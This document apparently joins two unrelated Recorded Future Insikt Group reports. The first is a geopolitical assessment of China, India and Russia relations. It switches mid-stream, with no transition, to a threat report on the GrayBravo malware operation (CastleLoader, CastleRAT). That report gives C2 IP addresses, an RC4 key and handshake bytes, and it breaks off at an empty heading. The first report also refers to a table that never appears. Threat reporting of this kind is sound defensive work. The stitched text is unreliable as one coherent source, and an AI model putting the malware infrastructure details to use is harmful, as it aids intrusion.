Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has decreased by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade disruptions and sanctions (1, 2, 3). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, prefers a protracted conflict in Ukraine as it diverts the US’s focus away from China.

At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document prepared by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.

Economic Dynamics

Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade denominated in Chinese yuan.

China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially increased. On September 2, 2025, Russia and China signed a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China buys Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly cancelled orders of Russian oil imports following US sanctions in late October 2025.

In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of dual-use and military-relevant goods and expertise. As of mid-2025, dual-use exports to Russia likely have at least slightly decreased from their peak in 2024.

Overall trade between China and Russia has also grown significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly double that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border crossings –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also expanding, and China and Russia have announced deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).

There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to avoid overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began halting transactions with Russian customers, and at least one bank did so as recently as September 2025 after being sanctioned by the EU. In September 2024, China implemented a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.

Military Dynamics

Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more frequent and more complex, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to participate in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise involved a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber flight into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia conducted their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.

In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he stated that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further indicates that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”

Beyond military exercises, US officials have asserted as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government asserts that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is providing Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US sanctioned a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were working on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been involved in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.

Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.

Cooperation in Propaganda and Influence Operations

We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, including media forums, journalist exchanges activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement stating that they would “jointly articulate a common stance in the global media space.”

China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) shows that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) spread narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely used a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.

Since approximately 2019, China has increasingly used computational propaganda and influence operation tactics likely learned by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently frame the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta banned Russian state media outlets from purchasing ads on its platforms, China Global TV Network placed at least 21 pro-Russia advertisements on Facebook in a single month.

China-India: Nascent Thaw of Longtime Tension-Filled Relationship

China-India relations have gone through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.

In recent months, China-India relations have likely returned to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely driven India to pursue improved ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” challenging years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, noted that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent rapprochement, significant hurdles and unresolved disagreements remain, making it less likely that China and India will form a long-term strategic partnership.

Political Dynamics

China’s approach to India is likely primarily driven by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to consolidate control over disputed border territories, leading to deadly skirmishes with India and cyberattacks against Indian critical infrastructure. India’s approach to China has likely been rooted in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.

Over the last year, China and India’s relations have thawed significantly, especially compared to 2020, when the China-India border dispute escalated. In 2024, China and India concluded an agreement that returned the border to its pre-2020 status, thereby completing a disengagement process and reopening border trade. India and China began re-engaging in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India resumed direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar emphasized the importance of continued cooperation between the two countries.

Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have endorsed the idea of a multipolar world, but Modi has emphasized the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely seeks to balance asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only supported inter-BRICS trade based on local currency.

Economic Dynamics

We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India issued Press Note 3, which limited Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly rejected a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.

Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily dependent on Chinese supply chains, which very likely gives Beijing some economic leverage over India.

India faces a significant and growing trade deficit with China — reaching $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China remains India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.

India has taken actions to reduce its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has bolstered investment in domestic production and implemented protectionist policies, such as the “Make in India” policy, the Production-Linked Incentive (PLI) scheme, and, most recently, the “National Manufacturing Mission.” Threatening China’s economic and technological interests, India banned hundreds of Chinese-developed mobile applications and has pursued efforts with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to impede Apple from moving its supply chain for US phones from China to India.

Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India views the region as its primary sphere of influence. The policy, considered a “defining subset of its overall foreign policy,” hinges on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly opposes China’s Belt and Road Initiative (BRI) because New Delhi views China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and counter India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project linking China and Pakistan through roads, railways, and pipelines — which India almost certainly perceived as the most immediate threat to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to facilitate Chinese energy imports while strengthening Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major concern for India.

Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion more in 2021 than in 2018. The total value of foreign direct investment from China into India also returned to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China launched the AIIB in 2016, and the bank has dozens of approved projects in India.

Military Dynamics

We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.

India and China share a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic dispute. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry devolved into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension followed, during which each side built up troops in the contested areas. After at least 21 rounds of Senior Highest Military Commander Level (Corps Commander) talks and other efforts, India and China signed an agreement in 2024, which led to the disengagement of troops. Even with border tensions currently defused, the overarching territorial dispute very likely persists as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.

In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active throughout the IOR, often as part of air, land, and sea-based multilateral exercises but also to support the PLA Navy’s “Far Seas Protection” strategy. In addition to military exercises, the PLA makes use of commercial ports in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely perceives China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes referred to as a “string of pearls” strategy by analysts outside of China — as an encirclement of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India competed to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately called at the port over New Delhi’s objections. In 2023, India objected to the presence of a Chinese state-owned research vessel, which China very likely uses to support PLA requirements. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to build out relevant infrastructure along disputed border areas.

Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual exercise with the US took place just 62 miles from a disputed border area. In 2024, India organized the first Tarang Shak air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines conducted a joint naval drill in the South China Sea. India almost certainly views China’s military cooperation and integration with Pakistan –– including China’s role as Islamabad’s main supply of arms –– as a grave threat to Indian security. China is responsible for 81% of Pakistan’s arms imports.

India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade

India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and 2024, India and Russia defined their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin issued a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”

Political Dynamics

India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to support India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has called Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to reform global power dynamics and is not anti-West, in contrast to Russia’s goal of ushering in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has articulated that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, Why Bharat Matters, asserts that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”

India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its declared neutral, non-aligned strategy. India abstained on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently calls for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly maintained a warm friendship despite US and European criticism of Russia, and Modi has referred to Russia as India’s “all-weather friend and trusted ally.”

Economic Dynamics

Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has stated that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia has been India’s top supplier of crude oil, and Russian oil exceeded 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and enabled it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports remained steady in the first half of September 2025. The US subsequently imposed sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to pause new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude turned around in the Baltic Sea — an incident that oil analysts attributed to the US sanctions pressure. However, Indian Oil continued to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.

Total trade between India and Russia amounted to $68.7 billion in FY2025, likely surging as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi aims to achieve $100 billion in trade with Russia by 2030. Both countries seek to reduce reliance on the US dollar, and 90% of trade is now settled in ruble-rupee transactions. However, India’s trade with the West will likely complicate financial integration; India has been hesitant to adopt sanctions-resistant payment networks with Russia and has dismissed the idea of replacing the US dollar.

Military Dynamics

We assess that India and Russia’s military relationship is centered on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has purchased roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases include Russia’s S-400 missile defense system, which India used in May 2025 to repel Pakistani missile attacks. India and Russia have also pursued joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has stagnated on other fronts, such as joint training and exercises.

Although Moscow continues to be India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has sought to reduce its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US signed a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.

The documented poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” revealed internal documents from Russia’s state-owned defense conglomerate Rostec detailing how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.

State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation

China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.

Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.

RIC Format: Dormant, Though Russia and China Are Interested in Reviving It

The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.

Between 2002 and 2020, twenty trilateral ministerial-level meetings occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers meeting in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.

In a 2022 joint statement, China and Russia declared their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov reiterated in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely indicating India’s reserved openness to it.

BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement

The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization committed to perpetuating a multipolar world via political, security, and economic cooperation.

Though Russia and China have sought to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India views the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.

Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are based on foundational treaties. The New Development Bank (NDB) supports collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.

We assess that BRICS could also facilitate Russia and China’s efforts to develop alternatives to the US dollar, though India’s hesitation to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have explored the development of a common currency and have specifically created a cross-border digital payment and messaging system backed by cryptocurrency, called BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “identifying possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”

Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests

Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO Summit in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to focus on border security and ethnic minority separatism in China’s Xinjiang region, though it has since expanded to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India joined in 2017, after being an observer since 2005, with Russia’s support and possibly without China’s, as Beijing sponsored Pakistan’s membership that same year.

China and Russia have used the SCO to advance their geopolitical aims, including shaping future multipolarism and projecting power. In particular, China uses the SCO as a foundation for expanding an international security architecture that is consistent with the CCP’s regime security.

We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently aligned. For example, India initially did not participate in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later joined a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped facilitate bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly objected to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is using the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.

Indicators of Deeper Trilateral Cooperation

The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.

Executive Summary

Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.

For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.

To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).

Key Findings

• Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.
• One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.
• Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.

Background

In September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.

Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.

Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.

Figure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)

Threat Analysis

Higher Tier Infrastructure

Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.

Figure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)

CastleRAT

CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.

Infrastructure Analysis

Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in Figure 3, Insikt Group observed two CastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, 104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.

Figure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)

Notably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00, and the server responds with trailing bytes 9e ff 74 70 before closing the connection. A similar exchange occurs with 5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00 00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.

Clustering by RC4 Key

Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see Figure 4). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.

Figure 4: RC4 key clusters (Source: Recorded Future)

CastleLoader

Infrastructure Analysis

